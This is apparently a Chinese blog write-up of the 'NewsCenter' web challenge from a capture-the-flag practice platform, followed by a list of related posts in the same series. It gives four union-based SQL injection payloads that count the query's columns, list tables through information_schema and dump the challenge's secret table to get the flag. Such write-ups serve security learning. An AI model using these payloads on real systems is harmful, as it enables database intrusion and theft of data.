文章目录

  • 前言
  • 一、NewsCenter
    • 1.题目
    • 2.答题

前言

SQL注入攻击是一种常见的网络攻击方式,攻击者通过在用户输入的数据中插入恶意代码,从而获取数据库中的敏感信息或者执行未授权的操作。为了防范SQL注入攻击,我们应该在应用程序中使用参数化查询这样的安全措施来防范这种攻击。同时,我们还应该加强数据过滤和输入验证,以确保用户输入的数据符合预期的格式和类型。

一、NewsCenter

1.题目

2.答题

首先用 ' and 0 union select 1,2,3 # 来初步判断该sql查询返回三列数据

然后用 ' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS # 得到表名,很明显我们需要得到 secret_table 表中的内容

再用 ' and 0 union select 1,column_name,data_type from information_schema.columns where table_name='secret_table'# 得到 secret_table 表的列名以及数据类型

最后就可以简单粗暴地得到flag

' and 0 union select 1,2,fl4g from secret_table #


得到flag:QCTF{sq1_inJec7ion_ezzz}

【愚公系列】2023年05月 攻防世界-Web(NewsCenter)相关推荐

  1. 【愚公系列】2023年05月 攻防世界-Web(lottery)

    文章目录 前言 一.lottery 1.题目 2.答题 前言 dirsearch是一个用于Web服务器的爬虫工具,它可以快速地扫描网站的目录,并找出隐藏的文件和目录.dirsearch可以检测出许多常 ...

  2. 【愚公系列】2023年05月 攻防世界-Web(unseping)

    文章目录 前言 一.unseping 1.题目 2.答题 前言 反序列化漏洞是一种安全漏洞,存在于那些使用序列化技术的应用程序中.反序列化是将已序列化数据还原回对象的过程.攻击者可以通过构造恶意序列化 ...

  3. 【愚公系列】2023年05月 攻防世界-Web(shrine)

    文章目录 前言 一.shrine 1.题目 2.答题 前言 Flask是一个轻量级的Web应用程序框架,用于Python编程语言.它是基于Werkzeug WSGI工具箱和Jinja2模板引擎构建的. ...

  4. 【愚公系列】2023年05月 攻防世界-Web(FlatScience)

    文章目录 前言 一.FlatScience 1.题目 2.答题 前言 Robots协议,也称作robots.txt,是一种在Web站点中告诉搜索引擎蜘蛛哪些页面可以被访问的协议.该协议规定了机器人在访 ...

  5. 【愚公系列】2023年05月 攻防世界-Web(file_include)

    文章目录 前言 1.文件包含漏洞 2.php伪协议 3.php包含漏洞函数 一.file_include 1.题目 2.答题 总结 前言 1.文件包含漏洞 文件包含漏洞(File Inclusion ...

  6. 【愚公系列】2023年05月 攻防世界-Web(Web_php_include)

    文章目录 前言 1.文件包含漏洞 2.php伪协议 3.php包含漏洞函数 一.Web_php_include 1.题目 2.答题 2.1 伪协议解题 2.2 中国蚁剑 2.3 数据库写入 前言 1. ...

  7. 【愚公系列】2023年05月 攻防世界-Web(fileclude)

    文章目录 前言 1.文件包含漏洞 2.php伪协议 一.fileclude 1.题目 2.答题 前言 1.文件包含漏洞 文件包含漏洞(File Inclusion Vulnerability)是一种常 ...

  8. 【愚公系列】2023年05月 攻防世界-Web(fileinclude)

    文章目录 前言 1.文件包含漏洞 2.php伪协议 一.fileinclude 1.题目 2.答题 前言 1.文件包含漏洞 文件包含漏洞(File Inclusion Vulnerability)是一 ...

  9. 【愚公系列】2023年05月 攻防世界-Web(Web_php_unserialize)

    文章目录 前言 一.Web_php_unserialize 1.题目 2.答题 前言 PHP的序列化漏洞是一种安全漏洞,攻击者可以利用这种漏洞来执行恶意代码或获取敏感信息.具体来说,攻击者可以通过在序 ...

  10. 【愚公系列】2023年05月 攻防世界-Web(Confusion1)

    文章目录 前言 一.Confusion1 1.题目 2.答题 前言 SSTI漏洞(Server Side Template Injection,服务端模板注入漏洞)是一种 web 应用程序中的安全漏洞 ...

最新文章

  1. 使用Keras训练自动驾驶(使用Udacity自动驾驶模拟器)
  2. pandas使用dropna函数计算返回dataframe中不包含缺失值的行索引列表list(index of rows without missing values in dataframe)
  3. os.clock()导致的bug
  4. Rose Study
  5. [SQL Server]无法创建 SSIS 运行时对象,请验证 DTS.dll 是否可用及是否已注册
  6. tomcat正常启动但是访问 404
  7. 神经元模型及网络结构
  8. 又收集了一个字体图标站
  9. OKR和KPI的区别是啥?
  10. 通过NodeJS自动生成的MySQL的REST风格API
  11. 【Matplotlib】【Python】如何使用matplotlib绘制绘制随机生成的点--随机漫步详解
  12. 接管客厅第一步:联想智能音箱体验评测
  13. 【linux基础】linux不能进入系统
  14. 阿里云Oss获取图片的大小信息
  15. 软件测试 (4)Linux命令
  16. 手持6位半电压信号源产品级实现记录(一)
  17. 青山~深入理解mysql
  18. 奶牛家族(斐波那契数列的快速幂乘矩阵算法)
  19. 三国——CEO PK 孟德 2010-10-23
  20. 电脑通过Putty远程连接树莓派

热门文章

  1. Q1.Numpy_数组、数组查询、转置和轴对换、读写文件
  2. 你对信息系统项目管理师了解吗?值不值得考?
  3. 好久没来写文章了 。到此一游
  4. Python所有方向的学习路线,你们要的知识体系在这,千万别做了无用功!
  5. 作为全球最大的电商平台,亚马逊有什么过人之处?
  6. jeff seid_Jeff Key再做一次...适用于Windows的像素标尺
  7. 关于WSADuplicateSocket的理解~(整理)
  8. Python制作小软件——4. 利用PyInstaller打包成exe文件
  9. 蓝桥杯-福尔摩斯到某古堡探险
  10. 信息系统项目管理师考试经验